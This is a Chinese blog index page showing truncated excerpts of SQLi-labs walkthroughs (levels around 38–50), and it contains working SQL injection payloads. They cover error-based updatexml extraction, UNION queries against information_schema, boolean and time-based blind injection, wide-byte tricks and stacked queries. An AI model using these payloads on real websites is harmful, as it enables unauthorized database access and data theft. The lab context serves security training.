上一页 1 2 3 4 5 6 ··· 9 下一页
摘要: 1.参考Less(46),单引号闭合 2.爆破 (1)爆库:?sort=1' and(updatexml(1,concat(0x7e,(select database())),0)) --+ (2)爆表:?sort=1' and(updatexml(1,concat(0x7e,(select gro 阅读全文
posted @ 2020-03-14 15:02 孟雨 阅读(107) 评论(0) 推荐(0) 编辑
摘要: 1.参考 Less(46),数字型 2.爆破: (1)爆库:?sort=1 and(updatexml(1,concat(0x7e,(select database())),0)) (2)爆表:?sort=1 and(updatexml(1,concat(0x7e,(select group_con 阅读全文
posted @ 2020-03-14 14:42 孟雨 阅读(103) 评论(0) 推荐(0) 编辑
摘要: 1.参考Less(46) 2.时间盲注 阅读全文
posted @ 2020-03-14 14:32 孟雨 阅读(128) 评论(0) 推荐(0) 编辑
摘要: 1.参考Less(46) 2.盲注 (1)布尔盲注:?sort=1 ^(select(select version()) regexp '^0') (2)时间盲注:?sort=if(1=2,1,(SELECT(1)FROM(SELECT(SLEEP(5)))test)) 阅读全文
posted @ 2020-03-14 14:13 孟雨 阅读(97) 评论(0) 推荐(0) 编辑
摘要: 1.参看Less(46),闭合为单引号 2.爆破: (1)爆库:?sort=1' and(updatexml(1,concat(0x7e,(select database())),0)) --+ (2)爆表:?sort=1' and(updatexml(1,concat(0x7e,(select g 阅读全文
posted @ 2020-03-14 13:56 孟雨 阅读(116) 评论(0) 推荐(0) 编辑
摘要: 1.看一下php (1)用order by 注入来看看 (2)通过asc 和desc查看返回数据是否相同来简单判断是否存在order by注入 ?sort=1+asc ?sort=1+desc 2.报错注入 (1)爆库:?sort=1 and(updatexml(1,concat(0x7e,(sel 阅读全文
posted @ 2020-03-14 11:47 孟雨 阅读(154) 评论(0) 推荐(0) 编辑
摘要: 1.参考Less(38),这次变成数字型 2.爆破 (1)爆库:?id=1 and 1=2 union select 1,2,database() -- - (2)爆表:?id=1 and 1=2 union select 1,group_concat(table_name),3 from info 阅读全文
posted @ 2020-03-14 11:05 孟雨 阅读(105) 评论(0) 推荐(0) 编辑
摘要: 1.参考Less(38),在单引号后加括号; 2.爆破 (1)爆库:?id=1') and 1=2 union select 1,database(),3-- - (2)爆表:?id=1') and 1=2 union select 1,group_concat(table_name),3 from 阅读全文
posted @ 2020-03-14 11:04 孟雨 阅读(166) 评论(0) 推荐(0) 编辑
摘要: 1.和Less(38)差不多 2.爆破 (1)爆库:?id=0%9 union select 1,2,database() %23 (2)爆表:?id=0%9 union select 1,group_concat(table_name),3 from information_schema.tabl 阅读全文
posted @ 2020-03-14 11:03 孟雨 阅读(111) 评论(0) 推荐(0) 编辑
摘要: 1.查看一下php, mysqli_multi_query() 函数执行一个或多个针对数据库的查询。多个查询用分号进行分隔。(有这个才能进行堆叠)分号我们可以加入注入的新的语句 2.爆破: (1)爆库:?id=0%FE' union select 1,2,database() %23 (2)爆表:? 阅读全文
posted @ 2020-03-11 20:20 孟雨 阅读(171) 评论(0) 推荐(0) 编辑
上一页 1 2 3 4 5 6 ··· 9 下一页